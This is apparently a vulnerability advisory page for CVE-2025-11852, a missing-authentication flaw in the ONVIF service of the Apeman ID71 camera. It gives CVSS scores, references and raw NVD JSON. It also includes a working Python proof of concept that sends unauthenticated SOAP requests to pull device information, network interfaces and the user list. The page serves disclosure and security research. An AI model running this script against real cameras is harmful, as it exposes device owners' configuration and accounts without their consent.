CVE-2025-11852

Description

A vulnerability was found in Apeman ID71 218.53.203.117. The impacted element is an unknown function of the file /onvif/device_service of the component ONVIF Service. Performing manipulation results in missing authentication. The attack is possible to be carried out remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Apeman ID71 固件版本 218.53.203.117

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-11852 - Apeman ID71 ONVIF Missing Authentication PoC
# Exploits missing authentication in /onvif/device_service endpoint

import requests
import sys
from xml.etree import ElementTree as ET

TARGET = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.100"
PORT = 80
ONVIF_ENDPOINT = f"http://{TARGET}:{PORT}/onvif/device_service"

# SOAP request to GetDeviceInformation - no authentication required
GET_DEVICE_INFO = """<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"
               xmlns:tds="http://www.onvif.org/ver10/device/wsdl"
               xmlns:tt="http://www.onvif.org/ver10/schema">
  <soap:Header/>
  <soap:Body>
    <tds:GetDeviceInformation/>
  </soap:Body>
</soap:Envelope>"""

# SOAP request to get network interfaces
GET_NETWORK_INTERFACES = """<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"
               xmlns:tds="http://www.onvif.org/ver10/device/wsdl"
               xmlns:tt="http://www.onvif.org/ver10/schema">
  <soap:Header/>
  <soap:Body>
    <tds:GetNetworkInterfaces/>
  </soap:Body>
</soap:Envelope>"""

# SOAP request to get users list
GET_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"
               xmlns:tds="http://www.onvif.org/ver10/device/wsdl"
               xmlns:tt="http://www.onvif.org/ver10/schema">
  <soap:Header/>
  <soap:Body>
    <tds:GetUsers/>
  </soap:Body>
</soap:Envelope>"""

def exploit_onvif(target_url, soap_body, action):
    headers = {
        "Content-Type": "application/soap+xml; charset=utf-8",
        "SOAPAction": action
    }
    try:
        resp = requests.post(target_url, data=soap_body, headers=headers, timeout=10)
        if resp.status_code == 200:
            print(f"[+] Success - {action} response:")
            print(resp.text)
            return resp.text
        else:
            print(f"[-] Failed - Status code: {resp.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")
    return None

if __name__ == "__main__":
    print(f"[*] Targeting Apeman ID71 camera at {TARGET}")
    print(f"[*] ONVIF endpoint: {ONVIF_ENDPOINT}")
    print("\n[1] Attempting GetDeviceInformation...")
    exploit_onvif(ONVIF_ENDPOINT, GET_DEVICE_INFO,
                  "http://www.onvif.org/ver10/device/wsdl/GetDeviceInformation")
    print("\n[2] Attempting GetNetworkInterfaces...")
    exploit_onvif(ONVIF_ENDPOINT, GET_NETWORK_INTERFACES,
                  "http://www.onvif.org/ver10/device/wsdl/GetNetworkInterfaces")
    print("\n[3] Attempting GetUsers...")
    exploit_onvif(ONVIF_ENDPOINT, GET_USERS,
                  "http://www.onvif.org/ver10/device/wsdl/GetUsers")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11852
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11852
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11852/
[4] VulDB https://vuldb.com/cve/CVE-2025-11852
[5] https://github.com/juliourena/APEMAN-Camera-PoCs/blob/main/RTSP/RTSP_Unauthenticated.md
[6] https://vuldb.com/?ctiid.328798
[7] https://vuldb.com/?id.328798
[8] https://vuldb.com/?submit.668899

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11852", "sourceIdentifier": "[email protected]", "published": "2025-10-16T19:15:32.227", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Apeman ID71 218.53.203.117. The impacted element is an unknown function of the file /onvif/device_service of the component ONVIF Service. Performing manipulation results in missing authentication. The attack is possible to be carried out remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/juliourena/APEMAN-Camera-PoCs/blob/main/RTSP/RTSP_Unauthenticated.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.328798", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.328798", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.668899", "source": "[email protected]"}]}}